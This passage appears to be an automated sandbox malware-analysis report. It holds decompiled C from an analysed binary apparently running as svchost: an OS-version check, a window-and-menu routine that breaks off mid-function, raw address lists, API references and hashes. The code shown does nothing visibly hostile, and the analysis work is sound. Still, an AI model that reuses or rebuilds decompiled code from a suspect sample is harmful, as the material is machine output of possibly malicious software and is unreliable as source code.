				_t443 = GetVersionExA(_t851 + 0x1e0);
				if(_t443 == 0) {
					goto L166;
				}
				goto L2;
			}














































































    0x00468e90
    0x00468e92
    0x00468e9d
    0x00468e9e
    0x00468ea5
    0x00468eb4
    0x00468ec7
    0x00468ec7
    0x00468ed0
    0x00468ed5
    0x00468ee4
    0x00468f03
    0x00468f0a
    0x00468f0c
    0x0046972b
    0x00469730
    0x00469737
    0x00469745
    0x00469745
    0x00469750
    0x00469750
    0x0046975b
    0x0046975b
    0x00469761
    0x00469766
    0x00469772
    0x00469784
    0x0046a162
    0x0046a167
    0x0046a168
    0x0046a16d
    0x0046a178
    0x0046a185
    0x0046a192
    0x0046a197
    0x0046a19c
    0x0046a19f
    0x0046a1a4
    0x0046a1a8
    0x0046a1b3
    0x0046a1b8
    0x0046a1c3
    0x0046a1d0
    0x0046a1d0
    0x00469791
    0x00469795
    0x00469fb5
    0x00469fb9
    0x00469fbe
    0x00469fbf
    0x00469fcd
    0x00469fd0
    0x00469fd2
    0x00469fda
    0x00469fdc
    0x00469fe3
    0x00469fe8
    0x00469feb
    0x00469fef
    0x00469fef
    0x00469ff2
    0x00469ff2
    0x00469ff4
    0x00469ff4
    0x00469ff8
    0x00469ffc
    0x0046a001
    0x0046a001
    0x0046a013
    0x0046a021
    0x0046a024
    0x0046a026
    0x0046a02e
    0x0046a030
    0x0046a037
    0x0046a03c
    0x0046a03f
    0x0046a04d
    0x0046a04d
    0x0046a052
    0x0046a057
    0x0046a069
    0x0046a077
    0x0046a07a
    0x0046a07c
    0x0046a084
    0x0046a088
    0x0046a08d
    0x0046a092
    0x0046a095
    0x0046a0a1
    0x0046a0a1
    0x0046a0a5
    0x0046a0aa
    0x0046a0b3
    0x0046a0b6
    0x0046a0c0
    0x0046a0ce
    0x0046a0d1
    0x0046a0d3
    0x0046a0d7
    0x0046a0db
    0x0046a0dd
    0x0046a0e4
    0x0046a0e9
    0x0046a0ec
    0x0046a0f8
    0x0046a0f8
    0x0046a0fd
    0x0046a0fd
    0x0046a102
    0x0046a10c
    0x00000000
    0x0046a112
    0x0046a117
    0x0046a122
    0x0046a130
    0x0046a133
    0x0046a135
    0x0046a13d
    0x0046a13f
    0x0046a146
    0x0046a14b
    0x0046a14e
    0x0046a14e
    0x0046a159
    0x0046a15a
    0x0046a15a
    0x00000000
    0x0046a15a
    0x0046a10c
    0x0046979b
    0x00000000
    0x004697a2
    0x004697a6
    0x004697ab
    0x00000000
    0x00000000
    0x004697b1
    0x004697b5
    0x004697ba
    0x00000000
    0x00000000
    0x004697d7
    0x004697db
    0x004697e0
    0x004697e2
    0x004697f3
    0x004697fa
    0x004697ff
    0x00469804
    0x00469806
    0x00469817
    0x0046981e
    0x00469823
    0x00469828
    0x0046982a
    0x0046983e
    0x00469842
    0x00469847
    0x00469849
    0x00469857
    0x0046985e
    0x00469863
    0x00469868
    0x0046986a
    0x00469878
    0x0046987f
    0x00469884
    0x00469889
    0x0046988b
    0x0046989c
    0x004698a0
    0x004698a5
    0x004698a7
    0x004698b5
    0x004698ba
    0x004698ba
    0x004698be
    0x00000000
    0x004698be
    0x004698a9
    0x004698ad
    0x004698b2
    0x00000000
    0x004698b2
    0x0046988d
    0x00000000
    0x0046988d
    0x0046986c
    0x00469870
    0x00469875
    0x00000000
    0x00469875
    0x0046984b
    0x0046984f
    0x00469854
    0x00000000
    0x00469854
    0x0046982c
    0x00000000
    0x0046982c
    0x00469808
    0x0046980c
    0x00469811
    0x00000000
    0x00469811
    0x004697e4
    0x004697e8
    0x004697ed
    0x00000000
    0x00000000
    0x00469905
    0x00469909
    0x0046990e
    0x00469910
    0x00469a3f
    0x00469a46
    0x00469a4b
    0x00469a50
    0x00469a52
    0x00469bb1
    0x00469bb8
    0x00469bbd
    0x00469bc2
    0x00469bc4
    0x00469d93
    0x00469d9a
    0x00469d9f
    0x00469da4
    0x00469da6
    0x00469fab
    0x00469faf
    0x00469fb1
    0x00000000
    0x00000000
    0x00000000
    0x00469fb3
    0x00469dac
    0x00469db0
    0x00469db5
    0x00469db6
    0x00469dbb
    0x00469dbf
    0x00469dc2
    0x00469dc4
    0x00469dc7
    0x00469dc9
    0x00469dcb
    0x00469dcd
    0x00469dd1
    0x00469dd3
    0x00469dd5
    0x00469dd7
    0x00469dda
    0x00469ddc
    0x00469dde
    0x00469ddf
    0x00469de2
    0x00469de2
    0x00469de2
    0x00469de4
    0x00469de6
    0x00469ded
    0x00469df1
    0x00469df1
    0x00469df1
    0x00469df3
    0x00469dfc
    0x00469dfe
    0x00469e07
    0x00469e0e
    0x00469e18
    0x00469e1a
    0x00469e23
    0x00469e2a
    0x00469e34
    0x00469e36
    0x00469e3f
    0x00469e46
    0x00469e50
    0x00469e52
    0x00469e93
    0x00469e93
    0x00469e9a
    0x00469ea4
    0x00469ea6
    0x00469eaf
    0x00469eb6
    0x00469ebb
    0x00469ec0
    0x00469ec2
    0x00469f03
    0x00469f03
    0x00469f0a
    0x00469f0e
    0x00469f0f
    0x00469f14
    0x00469f16
    0x00469f18
    0x00469f1c
    0x00469f21
    0x00469f22
    0x00469f27
    0x00469f2b
    0x00469f2e
    0x00469f30
    0x00469f33
    0x00469f35
    0x00469f37
    0x00469f39
    0x00469f3d
    0x00469f3f
    0x00469f41
    0x00469f43
    0x00469f46
    0x00469f48
    0x00469f4a
    0x00469f4b
    0x00469f4e
    0x00469f4e
    0x00469f4e
    0x00469f50
    0x00469f52
    0x00469f52
    0x00469f55
    0x00469f55
    0x00469f55
    0x00469f55
    0x00469f57
    0x00469f5e
    0x00469f62
    0x00469f63
    0x00469f68
    0x00469f6a
    0x00469f6c
    0x00469f6c
    0x00469f71
    0x00469f71
    0x00469f75
    0x00469f76
    0x00469f7b
    0x00469f7f
    0x00469f82
    0x00469f84
    0x00469f87
    0x00469f89
    0x00469f8b
    0x00469f8d
    0x00469f91
    0x00469f93
    0x00469f95
    0x00469f97
    0x00469f9a
    0x00469f9c
    0x00469f9e
    0x00469f9f
    0x00469fa2
    0x00469fa2
    0x00469fa2
    0x00469fa4
    0x00469fa6
    0x00469fa6
    0x00469fa9
    0x00469fa9
    0x00469fa9
    0x00469fa9
    0x00000000
    0x00469f6a
    0x00469ec4
    0x00469ec9
    0x00469ec9
    0x00469ecd
    0x00469ece
    0x00469ed3
    0x00469ed7
    0x00469eda
    0x00469edc
    0x00469edf
    0x00469ee1
    0x00469ee3
    0x00469ee5
    0x00469ee9
    0x00469eeb
    0x00469eed
    0x00469eef
    0x00469ef2
    0x00469ef4
    0x00469ef6
    0x00469ef7
    0x00469efa
    0x00469efa
    0x00469efa
    0x00469efc
    0x00469efe
    0x00469efe
    0x00469f01
    0x00469f01
    0x00469f01
    0x00000000
    0x00469f01
    0x00469ea8
    0x00000000
    0x00469ea8
    0x00469e54
    0x00469e59
    0x00469e59
    0x00469e5d
    0x00469e5e
    0x00469e63
    0x00469e67
    0x00469e6a
    0x00469e6c
    0x00469e6f
    0x00469e71
    0x00469e73
    0x00469e75
    0x00469e79
    0x00469e7b
    0x00469e7d
    0x00469e7f
    0x00469e82
    0x00469e84
    0x00469e86
    0x00469e87
    0x00469e8a
    0x00469e8a
    0x00469e8a
    0x00469e8c
    0x00469e8e
    0x00469e8e
    0x00469e91
    0x00469e91
    0x00469e91
    0x00000000
    0x00469e91
    0x00469e38
    0x00000000
    0x00469e38
    0x00469e1c
    0x00000000
    0x00469e1c
    0x00469e00
    0x00000000
    0x00469e00
    0x00469bca
    0x00469bce
    0x00469bd3
    0x00469bd4
    0x00469bd9
    0x00469bdd
    0x00469be0
    0x00469be2
    0x00469be5
    0x00469be7
    0x00469be9
    0x00469beb
    0x00469bef
    0x00469bf1
    0x00469bf3
    0x00469bf5
    0x00469bf8
    0x00469bfa
    0x00469bfc
    0x00469bfd
    0x00469c00
    0x00469c00
    0x00469c00
    0x00469c02
    0x00469c04
    0x00469c0b
    0x00469c0f
    0x00469c0f
    0x00469c0f
    0x00469c11
    0x00469c1a
    0x00469c1c
    0x00469c25
    0x00469c2c
    0x00469c36
    0x00469c38
    0x00469c41
    0x00469c48
    0x00469c52
    0x00469c54
    0x00469c5d
    0x00469c64
    0x00469c6e
    0x00469c70
    0x00469cb1
    0x00469cb1
    0x00469cb8
    0x00469cc2
    0x00469cc4
    0x00469ccd
    0x00469cd4
    0x00469cd9
    0x00469cde
    0x00469ce0
    0x00469d21
    0x00469d21
    0x00469d28
    0x00469d2c
    0x00469d2d
    0x00469d32
    0x00469d34
    0x00469d75
    0x00469d75
    0x00469d7c
    0x00469d80
    0x00469d81
    0x00469d86
    0x00469d88
    0x00000000
    0x00000000
    0x00000000
    0x00469d8e
    0x00469d36
    0x00469d36
    0x00469d3a
    0x00469d3f
    0x00469d40
    0x00469d45
    0x00469d49
    0x00469d4c
    0x00469d4e
    0x00469d51
    0x00469d53
    0x00469d55
    0x00469d57
    0x00469d5b
    0x00469d5d
    0x00469d5f
    0x00469d61
    0x00469d64
    0x00469d66
    0x00469d68
    0x00469d69
    0x00469d6c
    0x00469d6c
    0x00469d6c
    0x00469d6e
    0x00469d70
    0x00469d70
    0x00469d73
    0x00469d73
    0x00469d73
    0x00000000
    0x00469d73
    0x00469ce2
    0x00469ce7
    0x00469ce7
    0x00469ceb
    0x00469cec
    0x00469cf1
    0x00469cf5
    0x00469cf8
    0x00469cfa
    0x00469cfd
    0x00469cff
    0x00469d01
    0x00469d03
    0x00469d07
    0x00469d09
    0x00469d0b
    0x00469d0d
    0x00469d10
    0x00469d12
    0x00469d14
    0x00469d15
    0x00469d18
    0x00469d18
    0x00469d18
    0x00469d1a
    0x00469d1c
    0x00469d1c
    0x00469d1f
    0x00469d1f
    0x00469d1f
    0x00000000
    0x00469d1f
    0x00469cc6
    0x00000000
    0x00469cc6
    0x00469c72
    0x00469c77
    0x00469c77
    0x00469c7b
    0x00469c7c
    0x00469c81
    0x00469c85
    0x00469c88
    0x00469c8a
    0x00469c8d
    0x00469c8f
    0x00469c91
    0x00469c93
    0x00469c97
    0x00469c99
    0x00469c9b
    0x00469c9d
    0x00469ca0
    0x00469ca2
    0x00469ca4
    0x00469ca5
    0x00469ca8
    0x00469ca8
    0x00469ca8
    0x00469caa
    0x00469cac
    0x00469cac
    0x00469caf
    0x00469caf
    0x00469caf
    0x00000000
    0x00469caf
    0x00469c56
    0x00000000
    0x00469c56
    0x00469c3a
    0x00000000
    0x00469c3a
    0x00469c1e
    0x00000000
    0x00469c1e
    0x00469a58
    0x00469a5c
    0x00469a61
    0x00469a62
    0x00469a67
    0x00469a6b
    0x00469a6e
    0x00469a70
    0x00469a73
    0x00469a75
    0x00469a77
    0x00469a79
    0x00469a7d
    0x00469a7f
    0x00469a81
    0x00469a83
    0x00469a86
    0x00469a88
    0x00469a8a
    0x00469a8b
    0x00469a8e
    0x00469a8e
    0x00469a8e
    0x00469a90
    0x00469a92
    0x00469a99
    0x00469a9d
    0x00469a9d
    0x00469a9d
    0x00469a9f
    0x00469aa8
    0x00469aaa
    0x00469ab3
    0x00469aba
    0x00469ac4
    0x00469ac6
    0x00469acf
    0x00469ad6
    0x00469ae0
    0x00469ae2
    0x00469b23
    0x00469b23
    0x00469b2a
    0x00469b34
    0x00469b36
    0x00469b3f
    0x00469b46
    0x00469b4b
    0x00469b50
    0x00469b52
    0x00469b93
    0x00469b93
    0x00469b9a
    0x00469b9e
    0x00469b9f
    0x00469ba4
    0x00469ba6
    0x00000000
    0x00000000
    0x00000000
    0x00469bac
    0x00469b54
    0x00469b59
    0x00469b59
    0x00469b5d
    0x00469b5e
    0x00469b63
    0x00469b67
    0x00469b6a
    0x00469b6c
    0x00469b6f
    0x00469b71
    0x00469b73
    0x00469b75
    0x00469b79
    0x00469b7b
    0x00469b7d
    0x00469b7f
    0x00469b82
    0x00469b84
    0x00469b86
    0x00469b87
    0x00469b8a
    0x00469b8a
    0x00469b8a
    0x00469b8c
    0x00469b8e
    0x00469b8e
    0x00469b91
    0x00469b91
    0x00469b91
    0x00000000
    0x00469b91
    0x00469b38
    0x00000000
    0x00469b38
    0x00469ae4
    0x00469ae9
    0x00469ae9
    0x00469aed
    0x00469aee
    0x00469af3
    0x00469af7
    0x00469afa
    0x00469afc
    0x00469aff
    0x00469b01
    0x00469b03
    0x00469b05
    0x00469b09
    0x00469b0b
    0x00469b0d
    0x00469b0f
    0x00469b12
    0x00469b14
    0x00469b16
    0x00469b17
    0x00469b1a
    0x00469b1a
    0x00469b1a
    0x00469b1c
    0x00469b1e
    0x00469b1e
    0x00469b21
    0x00469b21
    0x00469b21
    0x00000000
    0x00469b21
    0x00469ac8
    0x00000000
    0x00469ac8
    0x00469aac
    0x00000000
    0x00469aac
    0x00469916
    0x0046991a
    0x0046991f
    0x00469920
    0x00469925
    0x00469929
    0x0046992c
    0x0046992e
    0x00469931
    0x00469933
    0x00469935
    0x00469937
    0x0046993b
    0x0046993d
    0x0046993f
    0x00469941
    0x00469944
    0x00469946
    0x00469948
    0x00469949
    0x0046994c
    0x0046994c
    0x0046994c
    0x0046994e
    0x00469950
    0x00469957
    0x0046995b
    0x0046995b
    0x0046995b
    0x0046995d
    0x00469966
    0x00469968
    0x00469971
    0x00469978
    0x00469982
    0x00469984
    0x0046998d
    0x00469994
    0x0046999e
    0x004699a0
    0x004699a9
    0x004699b0
    0x004699ba
    0x004699bc
    0x004699fd
    0x004699fd
    0x00469a04
    0x00469a0e
    0x00469a10
    0x00469a1c
    0x00469a23
    0x00469a28
    0x00469a2d
    0x00469a2f
    0x00000000
    0x00000000
    0x00469a35
    0x00000000
    0x00469a35
    0x00469a12
    0x00000000
    0x00469a12
    0x004699be
    0x004699c3
    0x004699c3
    0x004699c7
    0x004699c8
    0x004699cd
    0x004699d1
    0x004699d4
    0x004699d6
    0x004699d9
    0x004699db
    0x004699dd
    0x004699df
    0x004699e3
    0x004699e5
    0x004699e7
    0x004699e9
    0x004699ec
    0x004699ee
    0x004699f0
    0x004699f1
    0x004699f4
    0x004699f4
    0x004699f4
    0x004699f6
    0x004699f8
    0x004699f8
    0x004699fb
    0x004699fb
    0x004699fb
    0x00000000
    0x004699fb
    0x004699a2
    0x00000000
    0x004699a2
    0x00469986
    0x00000000
    0x00469986
    0x0046996a
    0x00000000
    0x00000000
    0x004697c0
    0x004697c4
    0x004697c9
    0x004698bf
    0x004698bf
    0x004698cd
    0x004698d0
    0x004698d2
    0x004698da
    0x004698dc
    0x004698e3
    0x004698e8
    0x004698eb
    0x004698f6
    0x004698f6
    0x00000000
    0x00000000
    0x0046979b
    0x00468f12
    0x00468f13
    0x00469666
    0x0046966e
    0x00000000
    0x00000000
    0x00469674
    0x0046967b
    0x004696c1
    0x004696c1
    0x004696c9
    0x00469703
    0x00469703
    0x0046970b
    0x00469715
    0x0046971a
    0x0046971a
    0x00000000
    0x0046970b
    0x004696cb
    0x004696d5
    0x004696da
    0x004696e2
    0x004696eb
    0x004696eb
    0x004696f7
    0x004696fe
    0x00469701
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00469701
    0x0046967d
    0x00469687
    0x0046968c
    0x00469693
    0x00469695
    0x004696a1
    0x004696a6
    0x00469697
    0x00469697
    0x00469697
    0x004696ad
    0x004696b9
    0x004696bc
    0x004696bf
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004696bf
    0x00468f1a
    0x00000000
    0x00468f20
    0x00468f28
    0x00468f32
    0x00468f32
    0x00468f4b
    0x00468fbe
    0x00468fc6
    0x0046907a
    0x00469082
    0x0046933b
    0x0046933b
    0x00469346
    0x0046934d
    0x00469358
    0x00469360
    0x00469366
    0x0046936d
    0x00469386
    0x00469386
    0x00469389
    0x00469390
    0x00469397
    0x0046939f
    0x004693a6
    0x004693a8
    0x004693ad
    0x004693b0
    0x004693b2
    0x004693b5
    0x004693b8
    0x004693ba
    0x004693ba
    0x004693bc
    0x004693bd
    0x004693bd
    0x004693c9
    0x004693d0
    0x004693dd
    0x004693e4
    0x004693e9
    0x004693f3
    0x004693f8
    0x004693f8
    0x004693fb
    0x004693fe
    0x00469400
    0x00469400
    0x00469401
    0x00469401
    0x00469408
    0x00469411
    0x00469424
    0x00469439
    0x00469440
    0x00469448
    0x00469466
    0x0046946e
    0x00469479
    0x00469480
    0x00469487
    0x0046948e
    0x00469495
    0x0046949c
    0x004694ad
    0x004694b4
    0x004694bb
    0x004694c2
    0x004694cd
    0x004694d8
    0x004694e6
    0x004694ef
    0x004694f8
    0x00469501
    0x0046950a
    0x00469513
    0x00469516
    0x00469544
    0x00469568
    0x0046956d
    0x00469573
    0x00469586
    0x0046958d
    0x00469594
    0x0046959f
    0x004695a6
    0x004695ad
    0x004695af
    0x004695bb
    0x004695c0
    0x004695c0
    0x004695ca
    0x004695d4
    0x004695d6
    0x004695dd
    0x004695e4
    0x004695ef
    0x004695f5
    0x004695fa
    0x004695fd
    0x004695ff
    0x00469601
    0x00469604
    0x00469606
    0x00469606
    0x00469607
    0x00469607
    0x00469604
    0x00469613
    0x00469617
    0x00469619
    0x0046961e
    0x00469620
    0x00469628
    0x00469628
    0x00469620
    0x00469631
    0x0046963f
    0x00469651
    0x0046965c
    0x00469088
    0x00469088
    0x00469093
    0x0046909a
    0x004690a5
    0x004690ad
    0x004690b3
    0x004690ba
    0x004690d3
    0x004690d3
    0x004690d6
    0x004690dd
    0x004690e4
    0x004690ec
    0x004690f3
    0x004690f5
    0x004690fd
    0x004690ff
    0x00469102
    0x00469105
    0x00469107
    0x00469107
    0x00469109
    0x0046910a
    0x0046910a
    0x00469116
    0x00469121
    0x0046912e
    0x00469135
    0x00469140
    0x00469149
    0x00469155
    0x0046915d
    0x00469168
    0x0046917d
    0x00469185
    0x0046918c
    0x0046919d
    0x004691a0
    0x004691ed
    0x0046923a
    0x0046923f
    0x00469245
    0x0046924a
    0x00469254
    0x0046925f
    0x00469262
    0x00469264
    0x0046926c
    0x0046926e
    0x0046926e
    0x0046926c
    0x00469256
    0x00469256
    0x00469256
    0x00469283
    0x0046928a
    0x00469298
    0x004692a5
    0x004692ac
    0x004692b8
    0x004692bd
    0x004692bd
    0x004692c7
    0x004692d1
    0x004692dc
    0x004692ec
    0x004692ee
    0x004692f5
    0x004692fd
    0x004692fd
    0x004692f5
    0x00469306
    0x00469314
    0x00469326
    0x00469331
    0x00469331
    0x00000000
    0x00469082
    0x00468fcc
    0x00468fd5
    0x00469023
    0x00469026
    0x00000000
    0x0046902c
    0x0046902c
    0x00469034
    0x00469061
    0x0046906e
    0x00469073
    0x00469036
    0x0046903e
    0x0046904b
    0x00469050
    0x00469050
    0x00000000
    0x00469034
    0x00468fd7
    0x00468fdf
    0x00469008
    0x00469015
    0x0046901a
    0x00468fe1
    0x00468fe9
    0x00468ff6
    0x00468ffb
    0x00468ffb
    0x00000000
    0x00468fdf
    0x00468fd5
    0x00468f54
    0x00468f76
    0x00468f7e
    0x00468f9c
    0x00468fa4
    0x00000000
    0x00468faa
    0x00468fb2
    0x00468fb7
    0x00000000
    0x00468fb7
    0x00468fa4
    0x00468f88
    0x00468f94
    0x00468f9a
    0x00000000
    0x00000000
    0x00000000
    0x00468f9a
    0x00468f5e
    0x00468f6a
    0x00468f74
    0x00000000
    0x00000000
    0x00000000
    0x00468f74
    0x00468f1a
    0x00468eed
    0x00468ef9
    0x00468efd
    0x00000000
    0x00000000
    0x00000000

    APIs
    • GetVersionExA.KERNEL32 ref: 00468EE0
    • GetVersionExA.KERNEL32(?), ref: 00468EF9
      • Part of subcall function 0047FDAB: __EH_prolog.LIBCMT ref: 0047FDB0
      • Part of subcall function 004804CA: RtlEnterCriticalSection.NTDLL(004E1B90), ref: 0048053C
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Version$CriticalEnterH_prologSection
    • String ID: $ $ $ (Build $ Advanced Server$ BackOffice Small Business Edition$ Backup Domain Controller$ Datacenter$ Domain Controller$ Enterprise$ Personal$ Primary Domain Controller$ Professional$ Server$ Terminal Services$ Workstation$%02d$%d.$A$DOS$Failed in call to GetOSVersion$Microsoft Win32s $Microsoft Windows 2000 $Microsoft Windows 2003 $Microsoft Windows 95 $Microsoft Windows 98 $Microsoft Windows Me $Microsoft Windows NT $Microsoft Windows XP $OSR2 $SE $Service Pack %d$Unknown OS$Windows$Windows 2000$Windows 2003$Windows 7$Windows 95$Windows 95 OSR2$Windows 95 SP1$Windows 98$Windows 98 SP1$Windows 98 Second Edition$Windows ??$Windows CE$Windows Millenium Edition$Windows NT$Windows Server 2008$Windows Server 2008 R2$Windows Vista$Windows XP$Z$unknown$version
    • API String ID: 2295131389-483160897
    • Opcode ID: 95cc3abe9b61459900399e3f39164f1cdd3831e309504a54c600cbe889259cce
    • Instruction ID: 1496540494da85ad3aade5008464665070f51dbc7b71165d6175166d2af594d3
    • Opcode Fuzzy Hash: 95cc3abe9b61459900399e3f39164f1cdd3831e309504a54c600cbe889259cce
    • Instruction Fuzzy Hash: 30B2A2701043459BCB24DE61C891AEFB7D8BB94314F104E2FA59A572C1FFB89A09CB5B
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00416460 Relevance: 55.2, APIs: 29, Strings: 2, Instructions: 979windowCOMMONCrypto
    Download Yara Rule
    C-Code - Quality: 96%
    			E00416460(void* __eflags) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t286;
				void* _t287;
				struct HWND__* _t289;
				intOrPtr _t292;
				void* _t294;
				unsigned int _t302;
				struct HACCEL__* _t311;
				struct HMENU__* _t316;
				struct HMENU__* _t323;
				struct HMENU__* _t325;
				struct HMENU__* _t329;
				struct HMENU__* _t333;
				struct HWND__* _t334;
				struct HMENU__* _t336;
				struct HMENU__* _t338;
				void* _t340;
				struct HMENU__* _t341;
				struct HMENU__* _t345;
				signed int _t346;
				void* _t349;
				struct HMENU__* _t350;
				struct HMENU__* _t353;
				struct HMENU__* _t362;
				struct HMENU__* _t364;
				void* _t366;
				struct HMENU__* _t368;
				void* _t370;
				void* _t372;
				void* _t375;
				struct HMENU__* _t376;
				int _t377;
				void* _t378;
				void* _t380;
				int* _t386;
				void* _t387;
				struct HMENU__* _t388;
				struct HMENU__* _t391;
				void* _t393;
				void* _t401;
				struct HMENU__* _t402;
				struct HWND__* _t403;
				int* _t408;
				struct HMENU__* _t409;
				struct HMENU__* _t410;
				void* _t412;
				signed int _t413;
				struct HACCEL__* _t418;
				struct HMENU__* _t419;
				struct HMENU__* _t427;
				struct HMENU__* _t428;
				void* _t430;
				void* _t437;
				struct HMENU__* _t444;
				struct HACCEL__* _t445;
				struct HMENU__* _t446;
				signed int _t454;
				struct HACCEL__* _t459;
				struct HWND__* _t463;
				struct HMENU__* _t464;
				struct HMENU__* _t469;
				struct HMENU__* _t470;
				void* _t472;
				int _t476;
				struct HMENU__* _t483;
				signed int _t484;
				struct HMENU__* _t486;
				int* _t487;
				struct HMENU__* _t488;
				struct HMENU__* _t490;
				struct HWND__* _t491;
				struct HMENU__* _t493;
				intOrPtr* _t495;
				void* _t496;
				void* _t497;
				signed int _t498;
				signed int _t499;
				struct HMENU__* _t500;
				signed int _t501;
				struct HMENU__* _t502;
				struct HMENU__* _t503;
				signed int _t575;
				signed char _t576;
				struct HMENU__* _t613;
				signed int _t616;
				struct HMENU__* _t617;
				intOrPtr _t623;
				unsigned int _t633;
				signed int _t636;
				struct HMENU__* _t637;
				struct HMENU__* _t638;
				struct HMENU__* _t639;
				intOrPtr _t640;
				void* _t641;
				void* _t642;
				void* _t643;
				intOrPtr _t645;
				void* _t647;
				void* _t648;
				intOrPtr _t650;
				void* _t651;
				void* _t652;
				void* _t653;
				intOrPtr _t655;
				void* _t656;
				void* _t657;
				void* _t658;
				void* _t659;
				int* _t660;
				void* _t661;
				void* _t662;
				void* _t663;
				void* _t664;
				void* _t665;
				void* _t666;
				void* _t667;
				void* _t668;
				struct HMENU__* _t670;
				struct HMENU__* _t674;
				struct HACCEL__* _t676;
				signed int _t678;
				struct HMENU__* _t680;
				struct HMENU__* _t681;
				unsigned int _t682;
				intOrPtr _t683;
				struct HWND__* _t685;
				int* _t686;
				struct HMENU__* _t687;
				int* _t688;
				void* _t689;
				void* _t690;
				struct HMENU__** _t691;
				struct HMENU__** _t693;
				void* _t695;
				void* _t696;
				intOrPtr _t697;
				intOrPtr* _t698;
				signed int* _t699;
				void* _t700;
				struct HMENU__* _t702;
				void* _t703;
				void* _t704;
				intOrPtr _t706;
				void* _t708;
				int _t709;
				signed int _t710;
				intOrPtr _t713;
				struct HMENU__* _t714;
				intOrPtr* _t715;
				struct HMENU__* _t717;
				void* _t719;
				void* _t720;

				_t676 = 0;
				 *((intOrPtr*)(_t719 + 0x38)) = 0x64;
				 *(_t719 + 0x24) = 0;
				_t286 = E00418A40(0x3e9, 0, 0);
				_t707 = _t286;
				_t483 =  *(_t719 + 0xec);
				 *((intOrPtr*)(_t719 + 0x58)) = _t286;
				_t633 = _t483 + 0x14;
				_t504 = _t633;
				 *(_t719 + 0x1c) = _t633;
				_t287 = E004135B0(_t633, 0, 0);
				if(_t287 == 0) {
					L57:
					__eflags = 0;
					return 0;
				} else {
					if( *(_t719 + 0xec) != 0) {
						L7:
						if( *((intOrPtr*)(_t719 + 0xf4)) != 1) {
							_t289 =  *(_t719 + 0xf8);
							__eflags = _t289 - _t676;
							if(_t289 == _t676) {
								goto L14;
							} else {
								_t470 = IsWindow(_t289);
								__eflags = _t470;
								if(_t470 == 0) {
									goto L57;
								} else {
									goto L14;
								}
							}
						} else {
							 *(_t719 + 0xf8) = _t676;
							L14:
							E00418A40(0x7d9, _t676, _t676);
							 *(_t719 + 0x24) = _t483 + 0x34;
							E00413540(_t483 + 0x34, _t676, _t633);
							_t292 = E00413A20(_t707, _t483);
							 *((intOrPtr*)(_t719 + 0x4c)) = _t292;
							if(_t292 == _t676) {
								goto L57;
							} else {
								 *(_t719 + 0xa0) = _t676;
								 *(_t719 + 0x14) = _t676;
								_t294 = E00414080(_t633, _t719 + 0xb4);
								 *(_t719 + 0x28) = _t676;
								if(_t294 > _t676) {
									_push(_t676);
									_push(_t719 + 0x28);
									_push(_t676);
									_push(0xffffffff);
									_push(_t294);
									_push(E004135B0(_t633,  *((intOrPtr*)(_t719 + 0xb4)), _t676));
									_t469 = E00422FA0();
									_t719 = _t719 + 0x18;
									 *(_t719 + 0x10) = _t469;
								}
								E0040B5D0(_t719 + 0x54);
								 *((intOrPtr*)(_t719 + 0x54)) = 0x495ea0;
								E0040B5D0(_t719 + 0x7c);
								 *((intOrPtr*)(_t719 + 0x7c)) = 0x495ea0;
								E0040B5D0(_t719 + 0x68);
								 *((intOrPtr*)(_t719 + 0x68)) = 0x495ea0;
								E0040B5D0(_t719 + 0x34);
								_t678 =  *(_t483 + 0x18);
								_t484 = _t678;
								 *(_t719 + 0x30) = _t678;
								 *(_t719 + 0x1c) = _t484;
								if(_t678 <= 0) {
									L42:
									asm("sbb eax, eax");
									 *(_t719 + 0x48) =  ~( *(_t719 + 0x78)) &  *(_t719 + 0x70);
									_t302 =  *(_t719 + 0x64);
									asm("sbb edi, edi");
									_t680 =  *(_t719 + 0x14);
									_t636 =  ~_t302 &  *(_t719 + 0x5c);
									asm("sbb ecx, ecx");
									_t486 = 1;
									 *(_t719 + 0x20) =  ~( *(_t719 + 0x8c)) &  *(_t719 + 0x84);
									asm("sbb ecx, ecx");
									 *(_t719 + 0x10) = 1;
									 *(_t719 + 0x24) =  ~( *(_t719 + 0x44)) &  *(_t719 + 0x3c);
									 *(_t719 + 0x1c) = _t302 >> 2;
									while(1) {
										_t708 = E004135B0(_t680, _t486, 0);
										if(_t708 == 0) {
											break;
										}
										if(E00413C90(_t680, _t486) != 1) {
											_t498 = E0040C0B0(_t636,  *(_t719 + 0x20), E00413600( *(_t719 + 0x14),  *(_t719 + 0x10)));
											_t155 = _t708 + 0x18; // 0x18
											_t689 = _t155;
											 *(_t719 + 0x40) = ( *(_t719 + 0x2c))[_t498];
											_t690 = _t689 + E0040C020( *(_t719 + 0x20), _t689);
											_t401 = E0040C020( *(_t719 + 0x20), _t690);
											_t160 = _t690 + 0x18; // 0x18
											_t691 = _t401 + _t160;
											_t719 = _t719 + 0x14;
											_t402 =  *_t691;
											__eflags = _t402;
											if(_t402 == 0) {
												_t403 =  *(_t719 + 0x18);
											} else {
												_t413 = E0040C0B0(_t636,  *(_t719 + 0x1c), _t402);
												_t617 =  *(_t719 + 0x2c);
